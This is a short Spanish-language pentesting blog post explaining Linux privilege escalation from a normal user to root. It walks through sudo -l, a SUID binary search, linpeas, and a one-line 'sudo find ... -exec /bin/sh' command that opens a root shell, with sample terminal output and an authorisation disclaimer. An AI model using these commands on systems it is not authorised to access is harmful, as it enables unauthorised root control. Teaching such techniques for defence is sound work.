~ / blog / pentesting
KALI

Escalada de privilegios

Ya entraste como usuario normal.

¿Ahora cómo llegas a root? Primero, sudo menos l: te dice qué puedes ejecutar como root sin contraseña, y ahí suele estar la puerta.

Luego busca binarios con SUID, que corren con los permisos de su dueño. linpeas automatiza toda la búsqueda de vías de escalada.

Y si find se puede correr con sudo, un solo comando te da una shell de root. La escalada casi siempre vive en una mala configuración.

# los comandos

kali@kali:~$ sudo -lcopiar
(root) NOPASSWD: /usr/bin/find
kali@kali:~$ find / -perm -4000 -type f 2>/dev/nullcopiar
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/find
kali@kali:~$ ./linpeas.sh | grep -i 'possible'copiar
[+] Possible sudo pwnage: find
kali@kali:~$ sudo find . -exec /bin/sh \; -quitcopiar
sh-5.1# whoamicopiar
root
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.